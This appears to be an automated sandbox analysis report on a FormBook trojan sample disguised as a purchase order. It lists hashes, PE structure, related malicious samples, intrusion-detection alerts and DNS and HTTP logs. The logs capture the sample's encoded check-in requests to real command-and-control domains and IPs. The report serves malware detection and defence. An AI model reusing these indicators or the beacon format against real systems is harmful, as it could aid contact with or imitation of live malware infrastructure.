	5PthEm83NG.exe	Get hash	malicious	Browse	156.255.140.216
	od3Y2SFzdP.rtf	Get hash	malicious	Browse	156.226.160.44
CLOUDFLARENETUS	Statement of Account April-2021.exe	Get hash	malicious	Browse	104.21.19.200
	2070121SN-WS for Woosim i250MSR.pif.exe	Get hash	malicious	Browse	162.159.133.233
	FACTURA COMERCIAL_________________________________________________________PDF__.exe	Get hash	malicious	Browse	172.67.188.154
	Quotation.exe	Get hash	malicious	Browse	162.159.130.233
	8wx078Pm3P.exe	Get hash	malicious	Browse	172.67.150.158
	GUaL8Nw228.exe	Get hash	malicious	Browse	104.21.30.57
	8wx078Pm3P.exe	Get hash	malicious	Browse	172.67.150.158
	qn8nIbPPCO.exe	Get hash	malicious	Browse	172.67.151.39
	viMLlTHg3d.exe	Get hash	malicious	Browse	172.67.160.89
	8n6dlwyR8l.exe	Get hash	malicious	Browse	104.21.58.140
	GUaL8Nw228.exe	Get hash	malicious	Browse	104.21.30.57
	qn8nIbPPCO.exe	Get hash	malicious	Browse	104.21.72.139
	viMLlTHg3d.exe	Get hash	malicious	Browse	172.67.160.89
	Technical data sheet.exe	Get hash	malicious	Browse	172.67.188.154
	8n6dlwyR8l.exe	Get hash	malicious	Browse	172.67.160.89
	v8wtfyQr7r.exe	Get hash	malicious	Browse	104.21.55.224
	d0875029_by_Libranalysis.exe	Get hash	malicious	Browse	104.21.19.200
	Order.exe	Get hash	malicious	Browse	104.22.18.188
	Account Ledger for 2020-APRIL 2021.exe	Get hash	malicious	Browse	162.159.134.233
	New purchase order.exe	Get hash	malicious	Browse	162.159.134.233

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO 367628usa.exe.log Download File
Process:	C:\Users\user\Desktop\PO 367628usa.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:ML9E4Ks2f84jE4Kx1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MxHKXfvjHKx1qHiYHKhQnoPtHoxHhAHR
MD5:	8198C64CE0786EABD4C792E7E6FC30E5
SHA1:	71E1676126F4616B18C751A0A775B2D64944A15A
SHA-256:	C58018934011086A883D1D56B21F6C1916B1CD83206ADD1865C9BDD29DADCBC4
SHA-512:	EE293C0F88A12AB10041F66DDFAE89BC11AB3B3AAD8604F1A418ABE43DF0980245C3B7F8FEB709AEE8E9474841A280E073EC063045EA39948E853AA6B4EC0FB0
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.966310386635364
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	PO 367628usa.exe
File size:	846336
MD5:	42cf4c3943d5a839412a16a4d8b8d65d
SHA1:	f26230352a412de0ca8b1ffc6fc07838b878a68a
SHA256:	1ceec55d4acbb8db907798df6b1be5832f32d2d4e459c5bd08d0252a0763b30c
SHA512:	06dc9e24ad16b10858fa7e24fbf2e179b09c3bba8d7cb4b94dedcab32503d2d40e1ed24949832ca37c507f183713343c4acefabd6747f197d31cd8a81b7c426f
SSDEEP:	24576:257gowGuMDvk9999+n3CZMWyOe01TZNfhj1aNBQ4OFkRZ:2XDM+n3q9ldjaNBQH
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P......$.......@... ... ....@.. .......................`............@................................

File Icon


Icon Hash:	f2d2e9fcc4ead362

Static PE Info

General
Entrypoint:	0x4d400a
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x609B8ECE [Wed May 12 08:16:14 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [004D4000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc28ec	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xce000	0x34b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xd4000	0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0xc2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
^8+S\|rz	0x2000	0xbea04	0xbec00	False	1.00031485501	data	7.99978876077	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.text	0xc2000	0xbec0	0xc000	False	0.444376627604	data	5.98929495854	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xce000	0x34b8	0x3600	False	0.361328125	data	5.24839991082	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd2000	0xc	0x200	False	0.044921875	data	0.0980041756627	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
	0xd4000	0x10	0x200	False	0.044921875	dBase III DBT, version number 0, next free block index 796960	0.142635768149	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xce130	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
RT_GROUP_ICON	0xd06d8	0x14	data
RT_VERSION	0xd06ec	0x364	data
RT_MANIFEST	0xd0a50	0xa65	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2013
Assembly Version	3.0.0.0
InternalName	CspAlgorithmType.exe
FileVersion	3.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	ServerManager_Core
ProductVersion	3.0.0.0
FileDescription	ServerManager_Core
OriginalFilename	CspAlgorithmType.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/12/21-14:44:17.541178	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49744	80	192.168.2.6	209.182.202.96
05/12/21-14:44:17.541178	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49744	80	192.168.2.6	209.182.202.96
05/12/21-14:44:17.541178	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49744	80	192.168.2.6	209.182.202.96
05/12/21-14:44:49.882224	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.6	34.102.136.180
05/12/21-14:44:49.882224	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.6	34.102.136.180
05/12/21-14:44:49.882224	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.6	34.102.136.180
05/12/21-14:44:50.021295	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49752	34.102.136.180	192.168.2.6
05/12/21-14:45:12.023558	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49754	34.102.136.180	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 14:44:17.336447001 CEST	49744	80	192.168.2.6	209.182.202.96
May 12, 2021 14:44:17.539150953 CEST	80	49744	209.182.202.96	192.168.2.6
May 12, 2021 14:44:17.541024923 CEST	49744	80	192.168.2.6	209.182.202.96
May 12, 2021 14:44:17.541177988 CEST	49744	80	192.168.2.6	209.182.202.96
May 12, 2021 14:44:17.741841078 CEST	80	49744	209.182.202.96	192.168.2.6
May 12, 2021 14:44:18.501599073 CEST	49744	80	192.168.2.6	209.182.202.96
May 12, 2021 14:44:18.703918934 CEST	80	49744	209.182.202.96	192.168.2.6
May 12, 2021 14:44:18.704257011 CEST	49744	80	192.168.2.6	209.182.202.96
May 12, 2021 14:44:23.722388029 CEST	49745	80	192.168.2.6	156.253.106.229
May 12, 2021 14:44:26.723609924 CEST	49745	80	192.168.2.6	156.253.106.229
May 12, 2021 14:44:32.724307060 CEST	49745	80	192.168.2.6	156.253.106.229
May 12, 2021 14:44:47.595201969 CEST	49751	80	192.168.2.6	156.253.106.229
May 12, 2021 14:44:49.840913057 CEST	49752	80	192.168.2.6	34.102.136.180
May 12, 2021 14:44:49.881947994 CEST	80	49752	34.102.136.180	192.168.2.6
May 12, 2021 14:44:49.882071018 CEST	49752	80	192.168.2.6	34.102.136.180
May 12, 2021 14:44:49.882224083 CEST	49752	80	192.168.2.6	34.102.136.180
May 12, 2021 14:44:49.925158978 CEST	80	49752	34.102.136.180	192.168.2.6
May 12, 2021 14:44:50.021295071 CEST	80	49752	34.102.136.180	192.168.2.6
May 12, 2021 14:44:50.021327019 CEST	80	49752	34.102.136.180	192.168.2.6
May 12, 2021 14:44:50.029829979 CEST	49752	80	192.168.2.6	34.102.136.180
May 12, 2021 14:44:50.030330896 CEST	49752	80	192.168.2.6	34.102.136.180
May 12, 2021 14:44:50.071338892 CEST	80	49752	34.102.136.180	192.168.2.6
May 12, 2021 14:44:50.597404003 CEST	49751	80	192.168.2.6	156.253.106.229
May 12, 2021 14:44:56.613770008 CEST	49751	80	192.168.2.6	156.253.106.229
May 12, 2021 14:45:00.764058113 CEST	49753	80	192.168.2.6	66.235.200.147
May 12, 2021 14:45:00.805219889 CEST	80	49753	66.235.200.147	192.168.2.6
May 12, 2021 14:45:00.805355072 CEST	49753	80	192.168.2.6	66.235.200.147
May 12, 2021 14:45:00.805551052 CEST	49753	80	192.168.2.6	66.235.200.147
May 12, 2021 14:45:00.846524000 CEST	80	49753	66.235.200.147	192.168.2.6
May 12, 2021 14:45:01.319247961 CEST	49753	80	192.168.2.6	66.235.200.147
May 12, 2021 14:45:01.360927105 CEST	80	49753	66.235.200.147	192.168.2.6
May 12, 2021 14:45:01.361038923 CEST	49753	80	192.168.2.6	66.235.200.147
May 12, 2021 14:45:11.845074892 CEST	49754	80	192.168.2.6	34.102.136.180
May 12, 2021 14:45:11.886277914 CEST	80	49754	34.102.136.180	192.168.2.6
May 12, 2021 14:45:11.886451960 CEST	49754	80	192.168.2.6	34.102.136.180
May 12, 2021 14:45:11.886488914 CEST	49754	80	192.168.2.6	34.102.136.180
May 12, 2021 14:45:11.927572966 CEST	80	49754	34.102.136.180	192.168.2.6
May 12, 2021 14:45:12.023557901 CEST	80	49754	34.102.136.180	192.168.2.6
May 12, 2021 14:45:12.023586035 CEST	80	49754	34.102.136.180	192.168.2.6
May 12, 2021 14:45:12.024002075 CEST	49754	80	192.168.2.6	34.102.136.180
May 12, 2021 14:45:12.024024963 CEST	49754	80	192.168.2.6	34.102.136.180
May 12, 2021 14:45:12.066961050 CEST	80	49754	34.102.136.180	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 14:43:01.428555012 CEST	60342	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:01.477366924 CEST	53	60342	8.8.8.8	192.168.2.6
May 12, 2021 14:43:21.349680901 CEST	61346	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:21.398500919 CEST	53	61346	8.8.8.8	192.168.2.6
May 12, 2021 14:43:24.693722010 CEST	51774	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:24.742449045 CEST	53	51774	8.8.8.8	192.168.2.6
May 12, 2021 14:43:25.606499910 CEST	56023	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:25.658571005 CEST	53	56023	8.8.8.8	192.168.2.6
May 12, 2021 14:43:28.722441912 CEST	58384	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:28.771378040 CEST	53	58384	8.8.8.8	192.168.2.6
May 12, 2021 14:43:29.864943981 CEST	60261	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:29.913788080 CEST	53	60261	8.8.8.8	192.168.2.6
May 12, 2021 14:43:30.785602093 CEST	56061	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:30.838978052 CEST	53	56061	8.8.8.8	192.168.2.6
May 12, 2021 14:43:31.721178055 CEST	58336	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:31.771974087 CEST	53	58336	8.8.8.8	192.168.2.6
May 12, 2021 14:43:32.272595882 CEST	53781	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:32.331994057 CEST	53	53781	8.8.8.8	192.168.2.6
May 12, 2021 14:43:32.615772009 CEST	54064	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:32.667319059 CEST	53	54064	8.8.8.8	192.168.2.6
May 12, 2021 14:43:35.303809881 CEST	52811	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:35.362885952 CEST	53	52811	8.8.8.8	192.168.2.6
May 12, 2021 14:43:36.863873959 CEST	55299	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:36.912844896 CEST	53	55299	8.8.8.8	192.168.2.6
May 12, 2021 14:43:38.166874886 CEST	63745	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:38.216016054 CEST	53	63745	8.8.8.8	192.168.2.6
May 12, 2021 14:43:43.744782925 CEST	50055	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:43.796560049 CEST	53	50055	8.8.8.8	192.168.2.6
May 12, 2021 14:43:44.550431013 CEST	61374	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:44.602118969 CEST	53	61374	8.8.8.8	192.168.2.6
May 12, 2021 14:43:45.441957951 CEST	50339	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:45.495352983 CEST	53	50339	8.8.8.8	192.168.2.6
May 12, 2021 14:43:46.405951023 CEST	63307	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:46.466908932 CEST	53	63307	8.8.8.8	192.168.2.6
May 12, 2021 14:43:47.318855047 CEST	49694	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:47.367999077 CEST	53	49694	8.8.8.8	192.168.2.6
May 12, 2021 14:43:48.710267067 CEST	54982	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:48.759144068 CEST	53	54982	8.8.8.8	192.168.2.6
May 12, 2021 14:43:54.901154995 CEST	50010	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:55.015284061 CEST	53	50010	8.8.8.8	192.168.2.6
May 12, 2021 14:43:55.317168951 CEST	63718	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:55.378597021 CEST	53	63718	8.8.8.8	192.168.2.6
May 12, 2021 14:43:55.609453917 CEST	62116	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:55.671864033 CEST	53	62116	8.8.8.8	192.168.2.6
May 12, 2021 14:43:56.291462898 CEST	63816	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:56.413023949 CEST	53	63816	8.8.8.8	192.168.2.6
May 12, 2021 14:43:57.854007959 CEST	55014	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:57.905849934 CEST	53	55014	8.8.8.8	192.168.2.6
May 12, 2021 14:43:58.009041071 CEST	62208	53	192.168.2.6	8.8.8.8
May 12, 2021 14:43:58.074162006 CEST	53	62208	8.8.8.8	192.168.2.6
May 12, 2021 14:44:01.802985907 CEST	57574	53	192.168.2.6	8.8.8.8
May 12, 2021 14:44:01.860528946 CEST	53	57574	8.8.8.8	192.168.2.6
May 12, 2021 14:44:02.425599098 CEST	51818	53	192.168.2.6	8.8.8.8
May 12, 2021 14:44:02.484363079 CEST	53	51818	8.8.8.8	192.168.2.6
May 12, 2021 14:44:02.956604004 CEST	56628	53	192.168.2.6	8.8.8.8
May 12, 2021 14:44:03.164084911 CEST	53	56628	8.8.8.8	192.168.2.6
May 12, 2021 14:44:03.913177967 CEST	60778	53	192.168.2.6	8.8.8.8
May 12, 2021 14:44:03.970308065 CEST	53	60778	8.8.8.8	192.168.2.6
May 12, 2021 14:44:04.991370916 CEST	53799	53	192.168.2.6	8.8.8.8
May 12, 2021 14:44:05.051984072 CEST	53	53799	8.8.8.8	192.168.2.6
May 12, 2021 14:44:06.065033913 CEST	54683	53	192.168.2.6	8.8.8.8
May 12, 2021 14:44:06.122181892 CEST	53	54683	8.8.8.8	192.168.2.6
May 12, 2021 14:44:12.681934118 CEST	59329	53	192.168.2.6	8.8.8.8
May 12, 2021 14:44:12.740622044 CEST	53	59329	8.8.8.8	192.168.2.6
May 12, 2021 14:44:17.177454948 CEST	64021	53	192.168.2.6	8.8.8.8
May 12, 2021 14:44:17.328610897 CEST	53	64021	8.8.8.8	192.168.2.6
May 12, 2021 14:44:23.508150101 CEST	56129	53	192.168.2.6	8.8.8.8
May 12, 2021 14:44:23.720913887 CEST	53	56129	8.8.8.8	192.168.2.6
May 12, 2021 14:44:39.849184036 CEST	58177	53	192.168.2.6	8.8.8.8
May 12, 2021 14:44:39.937792063 CEST	53	58177	8.8.8.8	192.168.2.6
May 12, 2021 14:44:42.973548889 CEST	50700	53	192.168.2.6	8.8.8.8
May 12, 2021 14:44:43.045808077 CEST	53	50700	8.8.8.8	192.168.2.6
May 12, 2021 14:44:45.252249002 CEST	54069	53	192.168.2.6	8.8.8.8
May 12, 2021 14:44:45.323209047 CEST	53	54069	8.8.8.8	192.168.2.6
May 12, 2021 14:44:47.352068901 CEST	61178	53	192.168.2.6	8.8.8.8
May 12, 2021 14:44:47.564670086 CEST	53	61178	8.8.8.8	192.168.2.6
May 12, 2021 14:44:49.764441013 CEST	57017	53	192.168.2.6	8.8.8.8
May 12, 2021 14:44:49.838244915 CEST	53	57017	8.8.8.8	192.168.2.6
May 12, 2021 14:44:55.047101021 CEST	56327	53	192.168.2.6	8.8.8.8
May 12, 2021 14:44:55.314804077 CEST	53	56327	8.8.8.8	192.168.2.6
May 12, 2021 14:45:00.605317116 CEST	50243	53	192.168.2.6	8.8.8.8
May 12, 2021 14:45:00.763115883 CEST	53	50243	8.8.8.8	192.168.2.6
May 12, 2021 14:45:06.363883972 CEST	62055	53	192.168.2.6	8.8.8.8
May 12, 2021 14:45:06.765923977 CEST	53	62055	8.8.8.8	192.168.2.6
May 12, 2021 14:45:11.772507906 CEST	61249	53	192.168.2.6	8.8.8.8
May 12, 2021 14:45:11.843046904 CEST	53	61249	8.8.8.8	192.168.2.6
May 12, 2021 14:45:17.039460897 CEST	65252	53	192.168.2.6	8.8.8.8
May 12, 2021 14:45:17.110006094 CEST	53	65252	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 12, 2021 14:44:17.177454948 CEST	192.168.2.6	8.8.8.8	0x9f32	Standard query (0)	www.servantsheartvalet.com	A (IP address)	IN (0x0001)
May 12, 2021 14:44:23.508150101 CEST	192.168.2.6	8.8.8.8	0xd1ee	Standard query (0)	www.patricksparber.com	A (IP address)	IN (0x0001)
May 12, 2021 14:44:47.352068901 CEST	192.168.2.6	8.8.8.8	0xef1b	Standard query (0)	www.patricksparber.com	A (IP address)	IN (0x0001)
May 12, 2021 14:44:49.764441013 CEST	192.168.2.6	8.8.8.8	0x8101	Standard query (0)	www.m-kenterprises.com	A (IP address)	IN (0x0001)
May 12, 2021 14:44:55.047101021 CEST	192.168.2.6	8.8.8.8	0x719e	Standard query (0)	www.meucamarimoficial.com	A (IP address)	IN (0x0001)
May 12, 2021 14:45:00.605317116 CEST	192.168.2.6	8.8.8.8	0xbd64	Standard query (0)	www.bridgestreetresources.com	A (IP address)	IN (0x0001)
May 12, 2021 14:45:06.363883972 CEST	192.168.2.6	8.8.8.8	0x5cfc	Standard query (0)	www.uuoouu-90.store	A (IP address)	IN (0x0001)
May 12, 2021 14:45:11.772507906 CEST	192.168.2.6	8.8.8.8	0xcb64	Standard query (0)	www.shadyshainarae.com	A (IP address)	IN (0x0001)
May 12, 2021 14:45:17.039460897 CEST	192.168.2.6	8.8.8.8	0xe47f	Standard query (0)	www.sherwooddaydesigns.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 12, 2021 14:44:17.328610897 CEST	8.8.8.8	192.168.2.6	0x9f32	No error (0)	www.servantsheartvalet.com	servantsheartvalet.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 14:44:17.328610897 CEST	8.8.8.8	192.168.2.6	0x9f32	No error (0)	servantsheartvalet.com		209.182.202.96	A (IP address)	IN (0x0001)
May 12, 2021 14:44:23.720913887 CEST	8.8.8.8	192.168.2.6	0xd1ee	No error (0)	www.patricksparber.com		156.253.106.229	A (IP address)	IN (0x0001)
May 12, 2021 14:44:47.564670086 CEST	8.8.8.8	192.168.2.6	0xef1b	No error (0)	www.patricksparber.com		156.253.106.229	A (IP address)	IN (0x0001)
May 12, 2021 14:44:49.838244915 CEST	8.8.8.8	192.168.2.6	0x8101	No error (0)	www.m-kenterprises.com	m-kenterprises.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 14:44:49.838244915 CEST	8.8.8.8	192.168.2.6	0x8101	No error (0)	m-kenterprises.com		34.102.136.180	A (IP address)	IN (0x0001)
May 12, 2021 14:44:55.314804077 CEST	8.8.8.8	192.168.2.6	0x719e	Name error (3)	www.meucamarimoficial.com	none	none	A (IP address)	IN (0x0001)
May 12, 2021 14:45:00.763115883 CEST	8.8.8.8	192.168.2.6	0xbd64	No error (0)	www.bridgestreetresources.com	bridgestreetresources.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 14:45:00.763115883 CEST	8.8.8.8	192.168.2.6	0xbd64	No error (0)	bridgestreetresources.com		66.235.200.147	A (IP address)	IN (0x0001)
May 12, 2021 14:45:06.765923977 CEST	8.8.8.8	192.168.2.6	0x5cfc	Name error (3)	www.uuoouu-90.store	none	none	A (IP address)	IN (0x0001)
May 12, 2021 14:45:11.843046904 CEST	8.8.8.8	192.168.2.6	0xcb64	No error (0)	www.shadyshainarae.com	shadyshainarae.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 14:45:11.843046904 CEST	8.8.8.8	192.168.2.6	0xcb64	No error (0)	shadyshainarae.com		34.102.136.180	A (IP address)	IN (0x0001)
May 12, 2021 14:45:17.110006094 CEST	8.8.8.8	192.168.2.6	0xe47f	No error (0)	www.sherwooddaydesigns.com	ext-sq.squarespace.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 14:45:17.110006094 CEST	8.8.8.8	192.168.2.6	0xe47f	No error (0)	ext-sq.squarespace.com		198.185.159.144	A (IP address)	IN (0x0001)
May 12, 2021 14:45:17.110006094 CEST	8.8.8.8	192.168.2.6	0xe47f	No error (0)	ext-sq.squarespace.com		198.49.23.145	A (IP address)	IN (0x0001)
May 12, 2021 14:45:17.110006094 CEST	8.8.8.8	192.168.2.6	0xe47f	No error (0)	ext-sq.squarespace.com		198.185.159.145	A (IP address)	IN (0x0001)
May 12, 2021 14:45:17.110006094 CEST	8.8.8.8	192.168.2.6	0xe47f	No error (0)	ext-sq.squarespace.com		198.49.23.144	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.servantsheartvalet.com

www.m-kenterprises.com

www.bridgestreetresources.com

www.shadyshainarae.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49744	209.182.202.96	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 14:44:17.541177988 CEST	6237	OUT	GET /meub/?5jYHTPD=WGLirrwFUtYpDXzpLjvBuZZEIXcS0L/7kvp4uO4ypDpemvycQ/ZH3e36klWLP588DVSUgz18wg==&W2MTZ=5jyDHn6x2rY HTTP/1.1 Host: www.servantsheartvalet.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49752	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 14:44:49.882224083 CEST	6280	OUT	GET /meub/?5jYHTPD=AHOwzMgiYatzzgqEm8fFrRw5FyeBXJPWAn72SIj91D3zxHtkj2kvoxgZPNykIH4K/OrW/jgvcw==&W2MTZ=5jyDHn6x2rY HTTP/1.1 Host: www.m-kenterprises.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
